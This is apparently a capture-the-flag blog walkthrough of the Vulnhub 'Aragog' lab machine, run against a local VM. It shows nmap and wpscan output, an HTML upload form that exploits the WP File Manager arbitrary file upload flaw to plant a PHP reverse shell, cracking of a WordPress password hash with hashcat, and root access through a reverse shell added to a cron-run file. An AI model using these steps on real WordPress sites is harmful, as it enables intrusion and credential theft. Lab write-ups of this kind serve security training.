Let’s do another cool machine of Vulnhub from @Mansoor R
Aragog is the 1st VM of 3-box HarryPotter.
Goal : find 2 horcruxes hidden inside the machine
Lab Setup:-
Download this machine from the link and import it into the virtual box.
Let’s start with reconnaissance.
Here is the machine welcome message and the ip.
In my case IP is 192.168.1.101
Let’s start a quick scan.
┌──(root💀kali)-[~/vm/arogya]
└─# nmap 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 10:16 IST
Nmap scan report for 192.168.1.101
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
In the simple scan got multiple open ports.
Here is the complete Nmap scan report
┌──(root💀kali)-[~/vm/arogya]
└─# nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
# Nmap 7.91 scan initiated Wed May 5 14:50:04 2021 as: nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
Nmap scan report for 192.168.1.101
Host is up, received arp-response (0.00073s latency).
Scanned at 2021-05-05 14:50:05 IST for 10s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSJJ1ZAbIA3lP2RbpxnhknzLJqrHne4be3xTLmVEXWg7YQ6FFZ/RA1VzmrFYPlvB1t1XwopptI+nA9BSG5+hllLyCQ1pDZkhIwyGHuBLZETD8cIJTlsxVCwnh67h7eeK4hTEtjp1rUodK30juDf5u7JnkwVfo78LvM8WV1LjVrmhsZiqzy1CxAoMFpiRp3ZlvpblL3gdd0wgSNrGqEwc6qJc6Z+RKGkLbnpgTnOsc6vGLs1xFOGrHF2qFeDpUWti0ZDSN31LtP1HtNItbBKSECcFD3KrN8nPaZCa2V9GA1jrpOOAF1j0ehcRlBoFqLZzQbO9RFeIkgqGNrz3PDt7vp
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBESZsj5u/F88CLIXTeBD8OgiCM2u8sKBgbvvjKccwFmCBMh3GmOHGP8qzzQwVTMkq1aN0WSIk7h8/cHCT2tZLzE=
| 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMsH4OtBIy/He42Rc6KvtI6w2855JMLVloVFy5/0Rtj4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/5%OT=22%CT=1%CU=37181%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=6092634F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S
In port 80 got Harry Potter image.
So i run the gobuster for directory scanning and got one blog directory
And in the /blog wordpress is running.
So i move towards to scan wordpress.
┌──(root💀kali)-[~/vm/arogya]
└─# wpscan --url http://192.168.1.101/blog/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive
After running wpscan got only 2 plugins in which one is default, So i move forward with the another plugin.
And i got this thing.
Plugin is vulnerable to File Manager 6.0–6.9 — Unauthenticated Arbitrary File Upload leading to RCE.
https://www.exploit-db.com/exploits/49178
https://wpscan.com/vulnerability/10389
So i created a simple HTML page and upload a payload from that file.
<html><body><form method="POST" enctype="multipart/form-data" action="http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"><input type="hidden" name="cmd" value="upload"/><input type="hidden" name="target" value="l1_Lw"/><input type="file" name="upload[]"/><br/><br/><input type="submit" value="Upload"/></form></body>
File : /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php
Now after calling it via browser got a reverse shell
Now next part is to check the user.
I found 2 user entry in /etc/passwd
gi**y:x:1001:1001::/home/XXXX:/bin/sh
ha****98:x:1000:1000:XXXX,,,:/home/XXXX:/bin/bash
Becuase Wordpress is running so i move forward to find the database credentials.
After enumerating got wordpress credentials file.
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'my******ss');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/xxxxx/xxxxx/xxxx/xxxx');
?>
In the databse got one hash
hagrid98:$P$BY**************JDHtc.
So i used hashcat to crack the hash
┌──(root💀kali)-[~/vm/arogya]
└─# hashcat -O -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt -o result.txt
So i got the password of ha****98
Got the first bash64 encrypted flag.
horcrux_{RiXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXets}
Privilege escalation is little bit tricky.
After searching got nothing so i move towards to monitor the running cron jobs.
I used pspy to monitor running cron job.
After monitoring some commands got someting intrestings so i payed attention on it.
So i added a reverse shell command on it and start a listner on other side.
Once the file executed then will get shell.
Now i Got the Second bash64 encrypted flag.
horcrux_{maXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOre}
Hurray !!!
All is fine but the Privilege escalation part is little bit challenging,
All you need to do is keep focusing on the running services and monitor each of them.